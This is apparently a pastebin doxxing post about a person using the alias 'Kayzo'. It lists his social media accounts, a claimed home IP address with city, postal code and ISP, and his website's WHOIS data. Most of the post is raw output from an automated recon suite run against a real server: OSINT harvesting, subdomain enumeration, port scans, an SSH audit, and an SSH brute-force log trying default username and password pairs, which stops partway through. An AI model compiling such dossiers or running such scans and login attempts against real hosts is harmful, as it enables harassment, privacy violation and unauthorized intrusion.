Note: Most of what is posted below he will lie about and say its not him but we have confirmation of 6 diffrent People Confirming it's 99% his shit. if you have more information please dont hasitate to add to new pastebin Alias: Kayzo Social Media Accounts: Why so many Instagrams? Instagram 1: kayozo_ Instagram 2: tyrantnetworks Instagram 3: tyrantsecurity Twitch: kayozo Loney Bastard Tinder: https://www.gotinder.com/@kayozo_ Telagram: https://www.t.me/kayozo_ GitLab: https://gitlab.com/kayozo_ Twitter: https://www.twitter.com/tyrantnetworks SteamGroup: https://steamcommunity.com/groups/tyrantnetworks =================================================== Digital Network Fingerprints His Current Home Internet IP Address: 72.176.30.128 Reverse DNS: 128.30.176.72.in-addr.arpa Hostname: 072-176-030-128.res.spectrum.com Nameservers: ns1.charter.com >> 24.216.90.1 ns4.charter.com >> 24.240.146.2 ns3.charter.com >> 24.240.146.1 ns2.charter.com >> 24.216.90.2 Location For an IP: 72.176.30.128 Continent: North America Country: United States IP Location Find In United States (US) Capital: Washington State: Texas City Location: Killeen Postal: 76542 Area: 254 Metro: 625 ISP: Time Warner Cable Organization: Time Warner Cable AS Number: AS11427 Time Warner Cable Internet LLC XBOX Gamertags Kayozo ======================================================= Website he owns: https://tyrantnetworks.com Name Servers: ns2.hexaneweb.com ns1.hexaneweb.com Name: TYRANTNETWORKS.COM Registry Domain ID: 2548455922_DOMAIN_COM-VRSN Domain Status: clientTransferProhibited Nameservers: NS1.HEXANEWEB.COM NS2.HEXANEWEB.COMDates Registry Expiration: 2021-07-25 00:18:24 UTC Created: 2020-07-25 00:18:24 UTC Registrar Information Name: NameCheap, Inc. IANA ID: 1068 Abuse contact email: abuse@namecheap.com Abuse contact phone: tel:+1.6613102107 GATHERING DNS INFO ====================================================================================•x[2020-09-09](21:49)x• ====================================================================================•x[2020-09-09](21:49)x• CHECKING FOR SUBDOMAIN HIJACKING ====================================================================================•x[2020-09-09](21:49)x• ====================================================================================•x[2020-09-09](21:49)x• GATHERING WHOIS INFO ====================================================================================•x[2020-09-09](21:49)x• GATHERING ULTATOOLS DNS INFO ====================================================================================•x[2020-09-09](21:49)x• Source: whois.arin.net IP Address: 142.44.219.227 Name: HO-2 Handle: NET-142-44-128-0-1 Registration Date: 6/21/17 Range: 142.44.128.0-142.44.255.255 Org: OVH Hosting, Inc. Org Handle: HO-2 Address: 800-1801 McGill College City: Montreal State/Province: QC Postal Code: H3A 2N4 Country: Canada Name Servers: ====================================================================================•x[2020-09-09](21:49)x• GATHERING DNS INFO ====================================================================================•x[2020-09-09](21:49)x• [+] Report saved to: /usr/share/sniper/loot/workspace/142.44.219.227/osint/intodns-142.44.219.227.html ====================================================================================•x[2020-09-09](21:49)x• GATHERING THEHARVESTER OSINT INFO ====================================================================================•x[2020-09-09](21:49)x• GATHERING EMAILS FROM EMAIL-FORMAT.COM ====================================================================================•x[2020-09-09](21:49)x• GATHERING DNS ALTERATIONS ====================================================================================•x[2020-09-09](21:49)x• COLLECTING OSINT FROM ONLINE DOCUMENTS ====================================================================================•x[2020-09-09](21:49)x• [-] Starting online search... [-] Searching for doc files, with a limit of 25 Searching 100 results... Results: 0 files found Starting to download 25 of them: ---------------------------------------- [-] Searching for pdf files, with a limit of 25 Searching 100 results... Results: 0 files found Starting to download 25 of them: ---------------------------------------- [-] Searching for xls files, with a limit of 25 Searching 100 results... Results: 0 files found Starting to download 25 of them: ---------------------------------------- [-] Searching for csv files, with a limit of 25 Searching 100 results... Results: 0 files found Starting to download 25 of them: ---------------------------------------- [-] Searching for txt files, with a limit of 25 Searching 100 results... Results: 0 files found Starting to download 25 of them: ---------------------------------------- processing user email [+] List of users found: -------------------------- [+] List of software found: ----------------------------- [+] List of paths and servers found: --------------------------------------- [+] List of e-mails found: ---------------------------- ====================================================================================•x[2020-09-09](21:49)x• COLLECTING OSINT FROM URLSCAN.IO ====================================================================================•x[2020-09-09](21:49)x• ====================================================================================•x[2020-09-09](21:49)x• GATHERING EMAILS VIA METASPLOIT ====================================================================================•x[2020-09-09](21:49)x• _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v6.0.5-dev- ] + -- --=[ 2059 exploits - 1117 auxiliary - 346 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: View advanced module options with advanced DOMAIN => 142.44.219.227 [*] Harvesting emails ..... [*] Searching Google for email addresses from 142.44.219.227 [*] Extracting emails from Google search results... [*] Searching Bing email addresses from 142.44.219.227 [*] Extracting emails from Bing search results... [*] Searching Yahoo for email addresses from 142.44.219.227 [*] Extracting emails from Yahoo search results... [*] Located 0 email addresses for 142.44.219.227 [*] Auxiliary module execution completed ====================================================================================•x[2020-09-09](21:50)x• GATHERING DNS SUBDOMAINS VIA SUBLIST3R ====================================================================================•x[2020-09-09](21:50)x• wc: /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227.txt: No such file or directory ====================================================================================•x[2020-09-09](21:50)x• GATHERING DNS SUBDOMAINS VIA AMASS ====================================================================================•x[2020-09-09](21:50)x• 0 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227-amass-sorted.txt 0 /usr/share/sniper/loot/workspace/142.44.219.227/ips/amass-ips-142.44.219.227.txt ====================================================================================•x[2020-09-09](21:50)x• GATHERING REVERSE WHOIS DNS SUBDOMAINS VIA AMASS ====================================================================================•x[2020-09-09](21:50)x• 0 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227-reverse-whois.txt ====================================================================================•x[2020-09-09](21:51)x• GATHERING DNS SUBDOMAINS VIA SUBFINDER (THIS COULD TAKE A WHILE...) ====================================================================================•x[2020-09-09](21:51)x• wc: /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227-subfinder.txt: No such file or directory ====================================================================================•x[2020-09-09](21:51)x• BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) ====================================================================================•x[2020-09-09](21:51)x• FATAL: Module netaddr missing (python-netaddr or python3-netaddr) 0 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227.txt ╔═╗╦═╗╔╦╗╔═╗╦ ╦ ║ ╠╦╝ ║ ╚═╗╠═╣ ╚═╝╩╚═ ╩o╚═╝╩ ╩ ====================================================================================•x[2020-09-09](21:51)x• GATHERING CERTIFICATE SUBDOMAINS ====================================================================================•x[2020-09-09](21:51)x• 0 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227-crt.txt [+] Domains saved to: /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227-crt.txt ====================================================================================•x[2020-09-09](21:51)x• GATHERING SPYSE SUBDOMAINS ====================================================================================•x[2020-09-09](21:51)x• Traceback (most recent call last): File "/usr/local/bin/spyse", line 410, in print(get_subdomains_aggregate(args.target, param, page, raw=args.raw)) File "/usr/local/bin/spyse", line 266, in get_subdomains_aggregate data = s.subdomains_aggregate(target, param=param, page=page)['cidr'] File "/usr/local/lib/python3.8/dist-packages/spyse/spyse.py", line 561, in subdomains_aggregate return r.json() File "/usr/local/lib/python3.8/dist-packages/requests/models.py", line 898, in json return complexjson.loads(self.text, **kwargs) File "/usr/lib/python3/dist-packages/simplejson/__init__.py", line 518, in loads return _default_decoder.decode(s) File "/usr/lib/python3/dist-packages/simplejson/decoder.py", line 370, in decode obj, end = self.raw_decode(s) File "/usr/lib/python3/dist-packages/simplejson/decoder.py", line 400, in raw_decode return self.scan_once(s, idx=_w(s, idx).end()) simplejson.errors.JSONDecodeError: Expecting value: line 1 column 1 (char 0) 0 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227-spyse.txt ====================================================================================•x[2020-09-09](21:51)x• GATHERING PROJECT SONAR SUBDOMAINS ====================================================================================•x[2020-09-09](21:51)x• 0 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227-projectsonar.txt ====================================================================================•x[2020-09-09](21:51)x• GATHERING GITHUB SUBDOMAINS ====================================================================================•x[2020-09-09](21:51)x• 0 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227.txt 1 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains-142.44.219.227-full.txt 0 /usr/share/sniper/loot/workspace/142.44.219.227/domains/domains_new-142.44.219.227.txt ====================================================================================•x[2020-09-09](21:51)x• CHECKING FOR EMAIL SECURITY ====================================================================================•x[2020-09-09](21:51)x• Traceback (most recent call last): File "/usr/share/sniper/plugins/spoofcheck/spoofcheck.py", line 5, in from colorama import init as color_init ImportError: No module named colorama ====================================================================================•x[2020-09-09](21:51)x• STARTING SUBOVER HIJACKING SCAN ====================================================================================•x[2020-09-09](21:51)x• SubOver v.1.2 Nizamul Rana (@Ice3man) ================================================== [~] Enjoy your hunt ! ====================================================================================•x[2020-09-09](21:51)x• STARTING PUBLIC S3 BUCKET SCAN /usr/share/sniper/modes/recon.sh: line 234: cd: /usr/share/sniper/plugins/slurp/: No such file or directory ====================================================================================•x[2020-09-09](21:51)x• /usr/share/sniper/modes/recon.sh: line 235: ./slurp-linux-amd64: No such file or directory ====================================================================================•x[2020-09-09](21:51)x• RETRIEVING ASN INFO ====================================================================================•x[2020-09-09](21:51)x• [:] ASN: 16276 ORG: OVH [:] Writing 118 CIDRs to file... [:] Converting to IPs... [:] Writing 3454484 IPs to file... [:] Done. ====================================================================================•x[2020-09-09](21:51)x• STARTING SUBNET RETRIEVAL ====================================================================================•x[2020-09-09](21:51)x• PINGING HOST ====================================================================================•x[2020-09-09](21:51)x• PING 142.44.219.227 (142.44.219.227) 56(84) bytes of data. 64 bytes from 142.44.219.227: icmp_seq=1 ttl=53 time=230 ms --- 142.44.219.227 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 229.908/229.908/229.908/0.000 ms ====================================================================================•x[2020-09-09](21:51)x• RUNNING TCP PORT SCAN ====================================================================================•x[2020-09-09](21:51)x• at 2020-09-09 21:51 UTC Nmap scan report for ip227.ip-142-44-219.net (142.44.219.227) Host is up (0.23s latency). Not shown: 62 closed ports PORT STATE SERVICE 22/tcp open ssh ====================================================================================•x[2020-09-09](21:51)x• RUNNING UDP PORT SCAN ====================================================================================•x[2020-09-09](21:51)x• at 2020-09-09 21:51 UTC scan report for ip227.ip-142-44-219.net (142.44.219.227) Host is up (0.24s latency). PORT STATE SERVICE 53/udp open|filtered domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp open|filtered tftp 88/udp open|filtered kerberos-sec 123/udp open|filtered ntp 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp open|filtered snmp 162/udp open|filtered snmptrap 389/udp open|filtered ldap 500/udp open|filtered isakmp 520/udp open|filtered route 2049/udp open|filtered nfs Nmap done: 1 IP address (1 host up) scanned in 5.60 seconds ====================================================================================•x[2020-09-09](21:51)x• RUNNING HTTP PROBE ====================================================================================•x[2020-09-09](21:51)x• ====================================================================================•x[2020-09-09](21:51)x• RUNNING INTRUSIVE SCANS ====================================================================================•x[2020-09-09](21:51)x• + -- --=[Port 21 closed... skipping. + -- --=[Port 22 opened... running tests... ====================================================================================•x[2020-09-09](21:51)x• RUNNING SSH AUDIT ====================================================================================•x[2020-09-09](21:51)x• # general (gen) banner: SSH-2.0-OpenSSH_7.4 (gen) software: OpenSSH 7.4 (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52) (gen) compression: enabled (zlib@openssh.com) # key exchange algorithms (kex) curve25519-sha256 -- [warn] unknown algorithm (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak) `- [info] available since OpenSSH 4.4 (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3 (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.3.0 (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53 (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack `- [warn] using small 1024-bit modulus `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28 # host-key algorithms (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28 (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2 (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2 (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves `- [warn] using weak random number generator could reveal the key `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (key) ssh-ed25519 -- [info] available since OpenSSH 6.5 # encryption algorithms (ciphers) (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5 `- [info] default cipher since OpenSSH 6.9. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes192-ctr -- [info] available since OpenSSH 3.7 (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2 (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2 (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] using weak cipher mode `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28 (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] using weak cipher mode `- [info] available since OpenSSH 2.3.0 (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] using weak cipher mode `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47 (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [fail] disabled since Dropbear SSH 0.53 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm `- [warn] using weak cipher mode `- [warn] using small 64-bit block size `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28 (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm `- [warn] using weak cipher mode `- [warn] using small 64-bit block size `- [info] available since OpenSSH 2.1.0 (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] using weak cipher `- [warn] using weak cipher mode `- [warn] using small 64-bit block size `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28 # message authentication code algorithms (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size `- [info] available since OpenSSH 6.2 (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 6.2 (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode `- [warn] using small 64-bit tag size `- [info] available since OpenSSH 4.7 (mac) umac-128@openssh.com-- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28 # algorithm recommendations (for OpenSSH 7.4) (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove (rec) -blowfish-cbc -- enc algorithm to remove (rec) -3des-cbc -- enc algorithm to remove (rec) -aes256-cbc -- enc algorithm to remove (rec) -cast128-cbc -- enc algorithm to remove (rec) -aes192-cbc -- enc algorithm to remove (rec) -aes128-cbc -- enc algorithm to remove (rec) -hmac-sha2-512 -- mac algorithm to remove (rec) -umac-128@openssh.com -- mac algorithm to remove (rec) -hmac-sha2-256 -- mac algorithm to remove (rec) -umac-64@openssh.com -- mac algorithm to remove (rec) -hmac-sha1 -- mac algorithm to remove (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove (rec) -umac-64-etm@openssh.com -- mac algorithm to remove ====================================================================================•x[2020-09-09](21:51)x• RUNNING NMAP SCRIPTS ====================================================================================•x[2020-09-09](21:51)x• Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 21:51 UTC NSE: Loaded 51 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 21:51 Completed NSE at 21:51, 0.00s elapsed Initiating NSE at 21:51 Completed NSE at 21:51, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 21:51 Completed Parallel DNS resolution of 1 host. at 21:51, 0.00s elapsed Initiating SYN Stealth Scan at 21:51 Scanning ip227.ip-142-44-219.net (142.44.219.227) [1 port] Discovered open port 22/tcp on 142.44.219.227 Completed SYN Stealth Scan at 21:51, 0.23s elapsed (1 total ports) Initiating Service scan at 21:51 Scanning 1 service on ip227.ip-142-44-219.net (142.44.219.227) Completed Service scan at 21:51, 0.47s elapsed (1 service on 1 host) Initiating OS detection (try #1) against ip227.ip-142-44-219.net (142.44.219.227) Initiating Traceroute at 21:51 Completed Traceroute at 21:51, 3.02s elapsed Initiating Parallel DNS resolution of 11 hosts. at 21:51 Completed Parallel DNS resolution of 11 hosts. at 21:51, 0.02s elapsed NSE: Script scanning 142.44.219.227. Initiating NSE at 21:51 NSE: [ssh-run 142.44.219.227:22] Failed to specify credentials and command to run. NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:root NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:admin NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:administrator NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:webadmin NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:sysadmin NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:netadmin NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:guest NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:user NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:web NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:test NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test: NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:123456 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:12345 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:123456789 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:password NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:iloveyou NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:princess NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:12345678 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:1234567 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:abc123 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:nicole NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:daniel NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:monkey NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:babygirl NSE: 